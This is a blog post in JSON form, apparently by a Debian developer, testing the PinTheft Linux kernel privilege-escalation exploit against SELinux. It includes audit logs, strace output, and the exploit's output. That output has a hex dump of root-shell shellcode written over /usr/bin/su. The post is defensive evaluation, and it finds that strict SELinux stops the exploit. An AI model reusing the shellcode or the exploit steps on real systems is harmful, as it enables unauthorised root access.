{
"$type": "site.standard.document",
"bskyPostRef": {
"cid": "bafyreidv2ih3656itkrjpdnh6pwc2ft2sitdt3rfty42zknoqlwouggaom",
"uri": "at://did:plc:46ti67tc37qcmwp2vaynk6fq/app.bsky.feed.post/3mmlvhtpzzkz2"
},
"coverImage": {
"$type": "blob",
"ref": {
"$link": "bafkreifqaymphlhaou7ymuxlsdcq46k6c4k27dbs2lrqq2rxp5ioaxmdoy"
},
"mimeType": "image/jpeg",
"size": 8554
},
"path": "/2026/05/24/debian-selinux-pintheft/",
"publishedAt": "2026-05-24T11:49:43.420Z",
"site": "https://etbe.coker.com.au",
"tags": [
"a new Linux exploit called PinTheft [1]",
"https://github.com/v12-security/pocs/tree/main/pintheft",
"Debian SE Linux and ssh-keysign-pwn",
"Copy Fail on Debian and SE Linux",
"Dirty Frag on Debian and SE Linux",
"@.8........."
],
"textContent": "We have a new Linux exploit called PinTheft [1]. I did some tests of it with Debian kernel **6.12.74+deb13+1-amd64**.\n\n## user_t\n\nWhen I run the exploit as user_t I see the following in the audit log:\n\n\n type=PROCTITLE msg=audit(1779615031.043:15540): proctitle=\"./exp\"\n type=AVC msg=audit(1779615031.043:15541): avc: denied { create } for pid=1360 comm=\"exp\" scontext=user_u:user_r:user_t:s0 tcontext=user_u:user_r:user_t:s0 tclass=rds_socket permissive=0\n type=SYSCALL msg=audit(1779615031.043:15541): arch=c000003e syscall=41 success=no exit=-13 a0=15 a1=5 a2=0 a3=0 items=0 ppid=879 pid=1360 auid=1000 uid=1000 gid=1000 euid=1000 suid=1000 fsuid=1000 egid=1000 sgid=1000 fsgid=1000 tty=pts0 ses=1 comm=\"exp\" exe=\"/home/test/b/pocs/pintheft/exp\" subj=user_u:user_r:user_t:s0 key=(null)ARCH=x86_64 SYSCALL=socket AUID=\"test\" UID=\"test\" GID=\"test\" EUID=\"test\" SUID=\"test\" FSUID=\"test\" EGID=\"test\" SGID=\"test\" FSGID=\"test\"\n\nThe last of the output of running the exploit is the following:\n\n\n [-] only stole 0/1024 refs — may not be enough\n [-] too few stolen refs, aborting\n [-] attempt 5 failed, retrying...\n [-] all 5 attempts failed\n\n## unconfined_t\n\nWhen I run it as unconfined_t it gave the same output and stracing it had many of the following:\n\n\n socket(AF_RDS, SOCK_SEQPACKET, 0) = -1 EAFNOSUPPORT (Address family not supported by protocol)\n\nAfter I ran “**modprobe rds** ” the exploit worked as unconfined_t with the following output:\n\n\n [*] verifying page cache overwrite...\n [*] page cache page 0 AFTER overwrite (our shellcode) (129 bytes):\n 0000: 7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00 |.ELF............|\n 0010: 03 00 3e 00 01 00 00 00 68 00 00 00 00 00 00 00 |..>.....h.......|\n 0020: 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |8...............|\n 0030: 00 00 00 00 40 00 38 00 01 00 00 00 05 00 00 00 |....@.8.........|\n 0040: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|\n 0050: 2f 62 69 6e 2f 73 68 00 81 00 00 00 00 00 00 00 |/bin/sh.........|\n 0060: 81 00 00 00 00 00 00 00 31 ff b0 69 0f 05 48 8d |........1..i..H.|\n 0070: 3d db ff ff ff 6a 00 57 48 89 e6 31 d2 b0 3b 0f |=....j.WH..1..;.|\n 0080: 05 |.|\n\n [+] verification PASSED — page cache overwritten with SHELL_ELF\n [+] executing /usr/bin/su (now contains setuid(0) + execve /bin/sh)...\n\n === RESTORE: sudo cp /tmp/.backup_su_13294 /usr/bin/su && sudo chmod u+s /usr/bin/su ===\n #\n\n## Conclusion\n\nSE Linux in a “strict” configuration stops this exploit.\n\nThe test VM is running Debian/Testing, I haven’t bothered investigating whether it’s a default setting for Debian to not load the **rds** module or whether it was some change that I made either directly or indirectly. Security via SE Linux is of more interest to me than security via controlling module load.\n\n * https://github.com/v12-security/pocs/tree/main/pintheft\n\n\n\nRelated posts:\n\n 1. Debian SE Linux and ssh-keysign-pwn I just tested out the ssh-keysign-pwn exploit [1] on Debian...\n 2. Copy Fail on Debian and SE Linux I have just learned of the Copy Fail kernel vulnerability...\n 3. Dirty Frag on Debian and SE Linux Hot on the heels of the Copy Fail vulnerability [1]...\n\n",
"title": "Russell Coker: Debian SE Linux and PinTheft",
"updatedAt": "2026-05-24T10:32:57.000Z"
}